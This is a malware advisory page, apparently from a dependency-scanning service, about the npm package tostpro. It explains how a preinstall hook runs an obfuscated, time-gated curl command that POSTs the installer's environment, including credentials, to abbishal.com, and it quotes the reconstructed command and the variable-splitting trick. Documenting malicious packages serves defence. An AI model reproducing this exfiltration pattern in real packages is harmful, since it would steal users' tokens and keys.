Logo
npm

tostpro@100.6.0

Vulnerability report · Last retrieved from osv.dev October 5, 2026 at 7:27 AM UTC

Malicious

OSV ID

MAL-2026-17564

Ecosystem

npm

Summary

The npm package tostpro@100.2.0 ships a preinstall lifecycle hook that invokes test.sh, which runs automatically on npm install. The script assembles the command curl and the data source env from single-letter shell variables (b=e, i=c, s=n, h=u, a=v, l=rl) and splits the destination into dom=https://abbishal. plus tld=com, reconstructing them at runtime as $i$h$l -d "$b$s$a" $dom$tld/sh/poc. Execution is gated by if [ date +%s -gt 1791141300 ] (a Unix timestamp corresponding to roughly 2026-10-04); once that deadline passes, the output of env — the installer's full process environment, which routinely contains CI tokens, cloud credentials, and API keys — is POSTed to https://abbishal.com/sh/poc. The README states "No network access. No data collection," directly contradicting the shipped behavior. The string-splitting obfuscation, time-bomb gate, and cover-story README together indicate deliberate evasion.

Source: amazon-inspector (2b31f6e946441400814984e1285717f9b2ee7fe5dacb7f0433f89396648a6183)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.